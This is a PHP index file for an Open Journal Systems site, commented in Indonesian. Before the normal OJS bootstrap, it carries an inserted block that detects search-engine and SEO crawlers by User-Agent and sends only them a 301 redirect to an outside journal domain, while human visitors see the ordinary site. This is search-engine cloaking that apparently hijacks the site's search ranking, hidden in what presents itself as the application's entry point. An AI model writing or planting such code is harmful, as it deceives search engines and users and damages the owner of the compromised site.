<?php
// Header (rapihin)
header('Vary: Accept-Language, User-Agent');

// Ambil user agent dengan aman
$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');

// URL redirect
$urlTo = "https://e-journal.ivet.ac.id/";

// List bot (lebih lengkap & aman)
$botPattern = '/(googlebot|bingbot|slurp|duckduckbot|baiduspider|yandex|ahrefs|semrush|mj12bot|facebookexternalhit|inspection|adsbot|mediapartners-google)/i';

// Jika bot → redirect 301
if (!empty($ua) && preg_match($botPattern, $ua)) {
    header("Location: $urlTo", true, 301);
    exit;
}

// ==== LANJUTKAN OJS ====

// Force HTTPS (rapihin juga)
define('FORCE_SSL_ADMIN', true);
if (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) {
    $_SERVER['HTTPS'] = 'on';
}

// Bootstrap OJS
define('INDEX_FILE_LOCATION', __FILE__);
$application = require('./lib/pkp/includes/bootstrap.inc.php');

// Jalankan aplikasi
$application->execute();
